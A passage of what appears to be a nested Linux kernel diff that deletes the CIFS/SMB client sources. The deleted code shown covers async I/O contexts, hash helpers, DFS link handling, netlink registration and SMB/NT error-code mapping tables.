+-	 * cifs_aio_ctx_release()
+-	 */
+-	ctx = kzalloc(sizeof(struct cifs_aio_ctx), GFP_KERNEL);
+-	if (!ctx)
+-		return NULL;
+-
+-	INIT_LIST_HEAD(&ctx->list);
+-	mutex_init(&ctx->aio_mutex);
+-	init_completion(&ctx->done);
+-	kref_init(&ctx->refcount);
+-	return ctx;
+-}
+-
+-void
+-cifs_aio_ctx_release(struct kref *refcount)
+-{
+-	struct cifs_aio_ctx *ctx = container_of(refcount,
+-					struct cifs_aio_ctx, refcount);
+-
+-	cifsFileInfo_put(ctx->cfile);
+-
+-	/*
+-	 * ctx->bv is only set if setup_aio_ctx_iter() was call successfuly
+-	 * which means that iov_iter_get_pages() was a success and thus that
+-	 * we have taken reference on pages.
+-	 */
+-	if (ctx->bv) {
+-		unsigned i;
+-
+-		for (i = 0; i < ctx->npages; i++) {
+-			if (ctx->should_dirty)
+-				set_page_dirty(ctx->bv[i].bv_page);
+-			put_page(ctx->bv[i].bv_page);
+-		}
+-		kvfree(ctx->bv);
+-	}
+-
+-	kfree(ctx);
+-}
+-
+-#define CIFS_AIO_KMALLOC_LIMIT (1024 * 1024)
+-
+-int
+-setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw)
+-{
+-	ssize_t rc;
+-	unsigned int cur_npages;
+-	unsigned int npages = 0;
+-	unsigned int i;
+-	size_t len;
+-	size_t count = iov_iter_count(iter);
+-	unsigned int saved_len;
+-	size_t start;
+-	unsigned int max_pages = iov_iter_npages(iter, INT_MAX);
+-	struct page **pages = NULL;
+-	struct bio_vec *bv = NULL;
+-
+-	if (iov_iter_is_kvec(iter)) {
+-		memcpy(&ctx->iter, iter, sizeof(*iter));
+-		ctx->len = count;
+-		iov_iter_advance(iter, count);
+-		return 0;
+-	}
+-
+-	if (array_size(max_pages, sizeof(*bv)) <= CIFS_AIO_KMALLOC_LIMIT)
+-		bv = kmalloc_array(max_pages, sizeof(*bv), GFP_KERNEL);
+-
+-	if (!bv) {
+-		bv = vmalloc(array_size(max_pages, sizeof(*bv)));
+-		if (!bv)
+-			return -ENOMEM;
+-	}
+-
+-	if (array_size(max_pages, sizeof(*pages)) <= CIFS_AIO_KMALLOC_LIMIT)
+-		pages = kmalloc_array(max_pages, sizeof(*pages), GFP_KERNEL);
+-
+-	if (!pages) {
+-		pages = vmalloc(array_size(max_pages, sizeof(*pages)));
+-		if (!pages) {
+-			kvfree(bv);
+-			return -ENOMEM;
+-		}
+-	}
+-
+-	saved_len = count;
+-
+-	while (count && npages < max_pages) {
+-		rc = iov_iter_get_pages2(iter, pages, count, max_pages, &start);
+-		if (rc < 0) {
+-			cifs_dbg(VFS, "Couldn't get user pages (rc=%zd)\n", rc);
+-			break;
+-		}
+-
+-		if (rc > count) {
+-			cifs_dbg(VFS, "get pages rc=%zd more than %zu\n", rc,
+-				 count);
+-			break;
+-		}
+-
+-		count -= rc;
+-		rc += start;
+-		cur_npages = DIV_ROUND_UP(rc, PAGE_SIZE);
+-
+-		if (npages + cur_npages > max_pages) {
+-			cifs_dbg(VFS, "out of vec array capacity (%u vs %u)\n",
+-				 npages + cur_npages, max_pages);
+-			break;
+-		}
+-
+-		for (i = 0; i < cur_npages; i++) {
+-			len = rc > PAGE_SIZE ? PAGE_SIZE : rc;
+-			bv[npages + i].bv_page = pages[i];
+-			bv[npages + i].bv_offset = start;
+-			bv[npages + i].bv_len = len - start;
+-			rc -= len;
+-			start = 0;
+-		}
+-
+-		npages += cur_npages;
+-	}
+-
+-	kvfree(pages);
+-	ctx->bv = bv;
+-	ctx->len = saved_len - count;
+-	ctx->npages = npages;
+-	iov_iter_bvec(&ctx->iter, rw, ctx->bv, npages, ctx->len);
+-	return 0;
+-}
+-
+-/**
+- * cifs_alloc_hash - allocate hash and hash context together
+- * @name: The name of the crypto hash algo
+- * @sdesc: SHASH descriptor where to put the pointer to the hash TFM
+- *
+- * The caller has to make sure @sdesc is initialized to either NULL or
+- * a valid context. It can be freed via cifs_free_hash().
+- */
+-int
+-cifs_alloc_hash(const char *name, struct shash_desc **sdesc)
+-{
+-	int rc = 0;
+-	struct crypto_shash *alg = NULL;
+-
+-	if (*sdesc)
+-		return 0;
+-
+-	alg = crypto_alloc_shash(name, 0, 0);
+-	if (IS_ERR(alg)) {
+-		cifs_dbg(VFS, "Could not allocate shash TFM '%s'\n", name);
+-		rc = PTR_ERR(alg);
+-		*sdesc = NULL;
+-		return rc;
+-	}
+-
+-	*sdesc = kmalloc(sizeof(struct shash_desc) + crypto_shash_descsize(alg), GFP_KERNEL);
+-	if (*sdesc == NULL) {
+-		cifs_dbg(VFS, "no memory left to allocate shash TFM '%s'\n", name);
+-		crypto_free_shash(alg);
+-		return -ENOMEM;
+-	}
+-
+-	(*sdesc)->tfm = alg;
+-	return 0;
+-}
+-
+-/**
+- * cifs_free_hash - free hash and hash context together
+- * @sdesc: Where to find the pointer to the hash TFM
+- *
+- * Freeing a NULL descriptor is safe.
+- */
+-void
+-cifs_free_hash(struct shash_desc **sdesc)
+-{
+-	if (unlikely(!sdesc) || !*sdesc)
+-		return;
+-
+-	if ((*sdesc)->tfm) {
+-		crypto_free_shash((*sdesc)->tfm);
+-		(*sdesc)->tfm = NULL;
+-	}
+-
+-	kfree_sensitive(*sdesc);
+-	*sdesc = NULL;
+-}
+-
+-/**
+- * rqst_page_get_length - obtain the length and offset for a page in smb_rqst
+- * @rqst: The request descriptor
+- * @page: The index of the page to query
+- * @len: Where to store the length for this page:
+- * @offset: Where to store the offset for this page
+- */
+-void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
+-			  unsigned int *len, unsigned int *offset)
+-{
+-	*len = rqst->rq_pagesz;
+-	*offset = (page == 0) ? rqst->rq_offset : 0;
+-
+-	if (rqst->rq_npages == 1 || page == rqst->rq_npages-1)
+-		*len = rqst->rq_tailsz;
+-	else if (page == 0)
+-		*len = rqst->rq_pagesz - rqst->rq_offset;
+-}
+-
+-void extract_unc_hostname(const char *unc, const char **h, size_t *len)
+-{
+-	const char *end;
+-
+-	/* skip initial slashes */
+-	while (*unc && (*unc == '\\' || *unc == '/'))
+-		unc++;
+-
+-	end = unc;
+-
+-	while (*end && !(*end == '\\' || *end == '/'))
+-		end++;
+-
+-	*h = unc;
+-	*len = end - unc;
+-}
+-
+-/**
+- * copy_path_name - copy src path to dst, possibly truncating
+- * @dst: The destination buffer
+- * @src: The source name
+- *
+- * returns number of bytes written (including trailing nul)
+- */
+-int copy_path_name(char *dst, const char *src)
+-{
+-	int name_len;
+-
+-	/*
+-	 * PATH_MAX includes nul, so if strlen(src) >= PATH_MAX it
+-	 * will truncate and strlen(dst) will be PATH_MAX-1
+-	 */
+-	name_len = strscpy(dst, src, PATH_MAX);
+-	if (WARN_ON_ONCE(name_len < 0))
+-		name_len = PATH_MAX-1;
+-
+-	/* we count the trailing nul */
+-	name_len++;
+-	return name_len;
+-}
+-
+-struct super_cb_data {
+-	void *data;
+-	struct super_block *sb;
+-};
+-
+-static void tcp_super_cb(struct super_block *sb, void *arg)
+-{
+-	struct super_cb_data *sd = arg;
+-	struct TCP_Server_Info *server = sd->data;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-
+-	if (sd->sb)
+-		return;
+-
+-	cifs_sb = CIFS_SB(sb);
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-	if (tcon->ses->server == server)
+-		sd->sb = sb;
+-}
+-
+-static struct super_block *__cifs_get_super(void (*f)(struct super_block *, void *),
+-					    void *data)
+-{
+-	struct super_cb_data sd = {
+-		.data = data,
+-		.sb = NULL,
+-	};
+-	struct file_system_type **fs_type = (struct file_system_type *[]) {
+-		&cifs_fs_type, &smb3_fs_type, NULL,
+-	};
+-
+-	for (; *fs_type; fs_type++) {
+-		iterate_supers_type(*fs_type, f, &sd);
+-		if (sd.sb) {
+-			/*
+-			 * Grab an active reference in order to prevent automounts (DFS links)
+-			 * of expiring and then freeing up our cifs superblock pointer while
+-			 * we're doing failover.
+-			 */
+-			cifs_sb_active(sd.sb);
+-			return sd.sb;
+-		}
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static void __cifs_put_super(struct super_block *sb)
+-{
+-	if (!IS_ERR_OR_NULL(sb))
+-		cifs_sb_deactive(sb);
+-}
+-
+-struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server)
+-{
+-	return __cifs_get_super(tcp_super_cb, server);
+-}
+-
+-void cifs_put_tcp_super(struct super_block *sb)
+-{
+-	__cifs_put_super(sb);
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-int match_target_ip(struct TCP_Server_Info *server,
+-		    const char *share, size_t share_len,
+-		    bool *result)
+-{
+-	int rc;
+-	char *target, *tip = NULL;
+-	struct sockaddr tipaddr;
+-
+-	*result = false;
+-
+-	target = kzalloc(share_len + 3, GFP_KERNEL);
+-	if (!target) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	scnprintf(target, share_len + 3, "\\\\%.*s", (int)share_len, share);
+-
+-	cifs_dbg(FYI, "%s: target name: %s\n", __func__, target + 2);
+-
+-	rc = dns_resolve_server_name_to_ip(target, &tip, NULL);
+-	if (rc < 0)
+-		goto out;
+-
+-	cifs_dbg(FYI, "%s: target ip: %s\n", __func__, tip);
+-
+-	if (!cifs_convert_address(&tipaddr, tip, strlen(tip))) {
+-		cifs_dbg(VFS, "%s: failed to convert target ip address\n",
+-			 __func__);
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	*result = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr,
+-				    &tipaddr);
+-	cifs_dbg(FYI, "%s: ip addresses match: %u\n", __func__, *result);
+-	rc = 0;
+-
+-out:
+-	kfree(target);
+-	kfree(tip);
+-
+-	return rc;
+-}
+-
+-int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+-{
+-	kfree(cifs_sb->prepath);
+-
+-	if (prefix && *prefix) {
+-		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
+-		if (!cifs_sb->prepath)
+-			return -ENOMEM;
+-
+-		convert_delimiter(cifs_sb->prepath, CIFS_DIR_SEP(cifs_sb));
+-	} else
+-		cifs_sb->prepath = NULL;
+-
+-	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	return 0;
+-}
+-
+-/*
+- * Handle weird Windows SMB server behaviour. It responds with
+- * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request for
+- * "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname> contains
+- * non-ASCII unicode symbols.
+- */
+-int cifs_inval_name_dfs_link_error(const unsigned int xid,
+-				   struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb,
+-				   const char *full_path,
+-				   bool *islink)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	size_t len;
+-	char *path;
+-	char *ref_path;
+-
+-	*islink = false;
+-
+-	/*
+-	 * Fast path - skip check when @full_path doesn't have a prefix path to
+-	 * look up or tcon is not DFS.
+-	 */
+-	if (strlen(full_path) < 2 || !cifs_sb ||
+-	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
+-	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
+-		return 0;
+-
+-	/*
+-	 * Slow path - tcon is DFS and @full_path has prefix path, so attempt
+-	 * to get a referral to figure out whether it is an DFS link.
+-	 */
+-	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
+-	path = kmalloc(len, GFP_KERNEL);
+-	if (!path)
+-		return -ENOMEM;
+-
+-	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
+-	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
+-					    cifs_remap(cifs_sb));
+-	kfree(path);
+-
+-	if (IS_ERR(ref_path)) {
+-		if (PTR_ERR(ref_path) != -EINVAL)
+-			return PTR_ERR(ref_path);
+-	} else {
+-		struct dfs_info3_param *refs = NULL;
+-		int num_refs = 0;
+-
+-		/*
+-		 * XXX: we are not using dfs_cache_find() here because we might
+-		 * end filling all the DFS cache and thus potentially
+-		 * removing cached DFS targets that the client would eventually
+-		 * need during failover.
+-		 */
+-		if (ses->server->ops->get_dfs_refer &&
+-		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
+-						     &num_refs, cifs_sb->local_nls,
+-						     cifs_remap(cifs_sb)))
+-			*islink = refs[0].server_type == DFS_TYPE_LINK;
+-		free_dfs_info_array(refs, num_refs);
+-		kfree(ref_path);
+-	}
+-	return 0;
+-}
+-#endif
+-
+-int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
+-{
+-	int timeout = 10;
+-	int rc;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	timeout *= server->nr_targets;
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 *
+-	 * On "soft" mounts we wait once. Hard mounts keep retrying until
+-	 * process is killed or server comes back on-line.
+-	 */
+-	do {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      timeout * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			return 0;
+-		}
+-		spin_unlock(&server->srv_lock);
+-	} while (retry);
+-
+-	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
+-	return -EHOSTDOWN;
+-}
+diff --git a/fs/cifs/netlink.c b/fs/cifs/netlink.c
+deleted file mode 100644
+index 147d9409252cd..0000000000000
+--- a/fs/cifs/netlink.c
++++ /dev/null
+@@ -1,90 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * Netlink routines for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#include <net/genetlink.h>
+-#include <uapi/linux/cifs/cifs_netlink.h>
+-
+-#include "netlink.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifs_swn.h"
+-
+-static const struct nla_policy cifs_genl_policy[CIFS_GENL_ATTR_MAX + 1] = {
+-	[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]	= { .type = NLA_U32 },
+-	[CIFS_GENL_ATTR_SWN_NET_NAME]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_SHARE_NAME]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_IP]			= { .len = sizeof(struct sockaddr_storage) },
+-	[CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY]	= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY]	= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_IP_NOTIFY]		= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_KRB_AUTH]		= { .type = NLA_FLAG },
+-	[CIFS_GENL_ATTR_SWN_USER_NAME]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_PASSWORD]		= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_DOMAIN_NAME]	= { .type = NLA_STRING },
+-	[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]	= { .type = NLA_U32 },
+-	[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]	= { .type = NLA_U32 },
+-	[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]	= { .type = NLA_STRING},
+-};
+-
+-static const struct genl_ops cifs_genl_ops[] = {
+-	{
+-		.cmd = CIFS_GENL_CMD_SWN_NOTIFY,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+-		.doit = cifs_swn_notify,
+-	},
+-};
+-
+-static const struct genl_multicast_group cifs_genl_mcgrps[] = {
+-	[CIFS_GENL_MCGRP_SWN] = { .name = CIFS_GENL_MCGRP_SWN_NAME },
+-};
+-
+-struct genl_family cifs_genl_family = {
+-	.name		= CIFS_GENL_NAME,
+-	.version	= CIFS_GENL_VERSION,
+-	.hdrsize	= 0,
+-	.maxattr	= CIFS_GENL_ATTR_MAX,
+-	.module		= THIS_MODULE,
+-	.policy		= cifs_genl_policy,
+-	.ops		= cifs_genl_ops,
+-	.n_ops		= ARRAY_SIZE(cifs_genl_ops),
+-	.resv_start_op	= CIFS_GENL_CMD_SWN_NOTIFY + 1,
+-	.mcgrps		= cifs_genl_mcgrps,
+-	.n_mcgrps	= ARRAY_SIZE(cifs_genl_mcgrps),
+-};
+-
+-/**
+- * cifs_genl_init - Register generic netlink family
+- *
+- * Return zero if initialized successfully, otherwise non-zero.
+- */
+-int cifs_genl_init(void)
+-{
+-	int ret;
+-
+-	ret = genl_register_family(&cifs_genl_family);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: failed to register netlink family\n",
+-				__func__);
+-		return ret;
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * cifs_genl_exit - Unregister generic netlink family
+- */
+-void cifs_genl_exit(void)
+-{
+-	int ret;
+-
+-	ret = genl_unregister_family(&cifs_genl_family);
+-	if (ret < 0) {
+-		cifs_dbg(VFS, "%s: failed to unregister netlink family\n",
+-				__func__);
+-	}
+-}
+diff --git a/fs/cifs/netlink.h b/fs/cifs/netlink.h
+deleted file mode 100644
+index e2fa8ed24c546..0000000000000
+--- a/fs/cifs/netlink.h
++++ /dev/null
+@@ -1,16 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Netlink routines for CIFS
+- *
+- * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
+- */
+-
+-#ifndef _CIFS_NETLINK_H
+-#define _CIFS_NETLINK_H
+-
+-extern struct genl_family cifs_genl_family;
+-
+-extern int cifs_genl_init(void);
+-extern void cifs_genl_exit(void);
+-
+-#endif /* _CIFS_NETLINK_H */
+diff --git a/fs/cifs/netmisc.c b/fs/cifs/netmisc.c
+deleted file mode 100644
+index 1b52e6ac431cb..0000000000000
+--- a/fs/cifs/netmisc.c
++++ /dev/null
+@@ -1,1021 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Error mapping routines from Samba libsmb/errormap.c
+- *   Copyright (C) Andrew Tridgell 2001
+- */
+-
+-#include <linux/net.h>
+-#include <linux/string.h>
+-#include <linux/in.h>
+-#include <linux/ctype.h>
+-#include <linux/fs.h>
+-#include <asm/div64.h>
+-#include <asm/byteorder.h>
+-#include <linux/inet.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smberr.h"
+-#include "cifs_debug.h"
+-#include "nterr.h"
+-
+-struct smb_to_posix_error {
+-	__u16 smb_err;
+-	int posix_code;
+-};
+-
+-static const struct smb_to_posix_error mapping_table_ERRDOS[] = {
+-	{ERRbadfunc, -EINVAL},
+-	{ERRbadfile, -ENOENT},
+-	{ERRbadpath, -ENOTDIR},
+-	{ERRnofids, -EMFILE},
+-	{ERRnoaccess, -EACCES},
+-	{ERRbadfid, -EBADF},
+-	{ERRbadmcb, -EIO},
+-	{ERRnomem, -EREMOTEIO},
+-	{ERRbadmem, -EFAULT},
+-	{ERRbadenv, -EFAULT},
+-	{ERRbadformat, -EINVAL},
+-	{ERRbadaccess, -EACCES},
+-	{ERRbaddata, -EIO},
+-	{ERRbaddrive, -ENXIO},
+-	{ERRremcd, -EACCES},
+-	{ERRdiffdevice, -EXDEV},
+-	{ERRnofiles, -ENOENT},
+-	{ERRwriteprot, -EROFS},
+-	{ERRbadshare, -EBUSY},
+-	{ERRlock, -EACCES},
+-	{ERRunsup, -EINVAL},
+-	{ERRnosuchshare, -ENXIO},
+-	{ERRfilexists, -EEXIST},
+-	{ERRinvparm, -EINVAL},
+-	{ERRdiskfull, -ENOSPC},
+-	{ERRinvname, -ENOENT},
+-	{ERRinvlevel, -EOPNOTSUPP},
+-	{ERRdirnotempty, -ENOTEMPTY},
+-	{ERRnotlocked, -ENOLCK},
+-	{ERRcancelviolation, -ENOLCK},
+-	{ERRalreadyexists, -EEXIST},
+-	{ERRmoredata, -EOVERFLOW},
+-	{ERReasnotsupported, -EOPNOTSUPP},
+-	{ErrQuota, -EDQUOT},
+-	{ErrNotALink, -ENOLINK},
+-	{ERRnetlogonNotStarted, -ENOPROTOOPT},
+-	{ERRsymlink, -EOPNOTSUPP},
+-	{ErrTooManyLinks, -EMLINK},
+-	{0, 0}
+-};
+-
+-static const struct smb_to_posix_error mapping_table_ERRSRV[] = {
+-	{ERRerror, -EIO},
+-	{ERRbadpw, -EACCES},  /* was EPERM */
+-	{ERRbadtype, -EREMOTE},
+-	{ERRaccess, -EACCES},
+-	{ERRinvtid, -ENXIO},
+-	{ERRinvnetname, -ENXIO},
+-	{ERRinvdevice, -ENXIO},
+-	{ERRqfull, -ENOSPC},
+-	{ERRqtoobig, -ENOSPC},
+-	{ERRqeof, -EIO},
+-	{ERRinvpfid, -EBADF},
+-	{ERRsmbcmd, -EBADRQC},
+-	{ERRsrverror, -EIO},
+-	{ERRbadBID, -EIO},
+-	{ERRfilespecs, -EINVAL},
+-	{ERRbadLink, -EIO},
+-	{ERRbadpermits, -EINVAL},
+-	{ERRbadPID, -ESRCH},
+-	{ERRsetattrmode, -EINVAL},
+-	{ERRpaused, -EHOSTDOWN},
+-	{ERRmsgoff, -EHOSTDOWN},
+-	{ERRnoroom, -ENOSPC},
+-	{ERRrmuns, -EUSERS},
+-	{ERRtimeout, -ETIME},
+-	{ERRnoresource, -EREMOTEIO},
+-	{ERRtoomanyuids, -EUSERS},
+-	{ERRbaduid, -EACCES},
+-	{ERRusempx, -EIO},
+-	{ERRusestd, -EIO},
+-	{ERR_NOTIFY_ENUM_DIR, -ENOBUFS},
+-	{ERRnoSuchUser, -EACCES},
+-/*	{ERRaccountexpired, -EACCES},
+-	{ERRbadclient, -EACCES},
+-	{ERRbadLogonTime, -EACCES},
+-	{ERRpasswordExpired, -EACCES},*/
+-	{ERRaccountexpired, -EKEYEXPIRED},
+-	{ERRbadclient, -EACCES},
+-	{ERRbadLogonTime, -EACCES},
+-	{ERRpasswordExpired, -EKEYEXPIRED},
+-
+-	{ERRnosupport, -EINVAL},
+-	{0, 0}
+-};
+-
+-/*
+- * Convert a string containing text IPv4 or IPv6 address to binary form.
+- *
+- * Returns 0 on failure.
+- */
+-static int
+-cifs_inet_pton(const int address_family, const char *cp, int len, void *dst)
+-{
+-	int ret = 0;
+-
+-	/* calculate length by finding first slash or NULL */
+-	if (address_family == AF_INET)
+-		ret = in4_pton(cp, len, dst, '\\', NULL);
+-	else if (address_family == AF_INET6)
+-		ret = in6_pton(cp, len, dst , '\\', NULL);
+-
+-	cifs_dbg(NOISY, "address conversion returned %d for %*.*s\n",
+-		 ret, len, len, cp);
+-	if (ret > 0)
+-		ret = 1;
+-	return ret;
+-}
+-
+-/*
+- * Try to convert a string to an IPv4 address and then attempt to convert
+- * it to an IPv6 address if that fails. Set the family field if either
+- * succeeds. If it's an IPv6 address and it has a '%' sign in it, try to
+- * treat the part following it as a numeric sin6_scope_id.
+- *
+- * Returns 0 on failure.
+- */
+-int
+-cifs_convert_address(struct sockaddr *dst, const char *src, int len)
+-{
+-	int rc, alen, slen;
+-	const char *pct;
+-	char scope_id[13];
+-	struct sockaddr_in *s4 = (struct sockaddr_in *) dst;
+-	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *) dst;
+-
+-	/* IPv4 address */
+-	if (cifs_inet_pton(AF_INET, src, len, &s4->sin_addr.s_addr)) {
+-		s4->sin_family = AF_INET;
+-		return 1;
+-	}
+-
+-	/* attempt to exclude the scope ID from the address part */
+-	pct = memchr(src, '%', len);
+-	alen = pct ? pct - src : len;
+-
+-	rc = cifs_inet_pton(AF_INET6, src, alen, &s6->sin6_addr.s6_addr);
+-	if (!rc)
+-		return rc;
+-
+-	s6->sin6_family = AF_INET6;
+-	if (pct) {
+-		/* grab the scope ID */
+-		slen = len - (alen + 1);
+-		if (slen <= 0 || slen > 12)
+-			return 0;
+-		memcpy(scope_id, pct + 1, slen);
+-		scope_id[slen] = '\0';
+-
+-		rc = kstrtouint(scope_id, 0, &s6->sin6_scope_id);
+-		rc = (rc == 0) ? 1 : 0;
+-	}
+-
+-	return rc;
+-}
+-
+-void
+-cifs_set_port(struct sockaddr *addr, const unsigned short int port)
+-{
+-	switch (addr->sa_family) {
+-	case AF_INET:
+-		((struct sockaddr_in *)addr)->sin_port = htons(port);
+-		break;
+-	case AF_INET6:
+-		((struct sockaddr_in6 *)addr)->sin6_port = htons(port);
+-		break;
+-	}
+-}
+-
+-/*****************************************************************************
+-convert a NT status code to a dos class/code
+- *****************************************************************************/
+-/* NT status -> dos error map */
+-static const struct {
+-	__u8 dos_class;
+-	__u16 dos_code;
+-	__u32 ntstatus;
+-} ntstatus_to_dos_map[] = {
+-	{
+-	ERRDOS, ERRgeneral, NT_STATUS_UNSUCCESSFUL}, {
+-	ERRDOS, ERRbadfunc, NT_STATUS_NOT_IMPLEMENTED}, {
+-	ERRDOS, ERRinvlevel, NT_STATUS_INVALID_INFO_CLASS}, {
+-	ERRDOS, 24, NT_STATUS_INFO_LENGTH_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ACCESS_VIOLATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IN_PAGE_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_INVALID_HANDLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_INITIAL_STACK}, {
+-	ERRDOS, 193, NT_STATUS_BAD_INITIAL_PC}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_CID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TIMER_NOT_CANCELED}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_DEVICE}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_FILE}, {
+-	ERRDOS, ERRbadfunc, NT_STATUS_INVALID_DEVICE_REQUEST}, {
+-	ERRDOS, 38, NT_STATUS_END_OF_FILE}, {
+-	ERRDOS, 34, NT_STATUS_WRONG_VOLUME}, {
+-	ERRDOS, 21, NT_STATUS_NO_MEDIA_IN_DEVICE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_MEDIA}, {
+-	ERRDOS, 27, NT_STATUS_NONEXISTENT_SECTOR},
+-/*	{ This NT error code was 'sqashed'
+-	 from NT_STATUS_MORE_PROCESSING_REQUIRED to NT_STATUS_OK
+-	 during the session setup } */
+-	{
+-	ERRDOS, ERRnomem, NT_STATUS_NO_MEMORY}, {
+-	ERRDOS, 487, NT_STATUS_CONFLICTING_ADDRESSES}, {
+-	ERRDOS, 487, NT_STATUS_NOT_MAPPED_VIEW}, {
+-	ERRDOS, 87, NT_STATUS_UNABLE_TO_FREE_VM}, {
+-	ERRDOS, 87, NT_STATUS_UNABLE_TO_DELETE_SECTION}, {
+-	ERRDOS, 2142, NT_STATUS_INVALID_SYSTEM_SERVICE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_INSTRUCTION}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_LOCK_SEQUENCE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_VIEW_SIZE}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_FILE_FOR_SECTION}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_ALREADY_COMMITTED},
+-/*	{ This NT error code was 'sqashed'
+-	 from NT_STATUS_ACCESS_DENIED to NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE
+-	 during the session setup }   */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_ACCESS_DENIED}, {
+-	ERRDOS, 111, NT_STATUS_BUFFER_TOO_SMALL}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_OBJECT_TYPE_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NONCONTINUABLE_EXCEPTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DISPOSITION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNWIND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_STACK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_UNWIND_TARGET}, {
+-	ERRDOS, 158, NT_STATUS_NOT_LOCKED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PARITY_ERROR}, {
+-	ERRDOS, 487, NT_STATUS_UNABLE_TO_DECOMMIT_VM}, {
+-	ERRDOS, 487, NT_STATUS_NOT_COMMITTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PORT_ATTRIBUTES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PORT_MESSAGE_TOO_LONG}, {
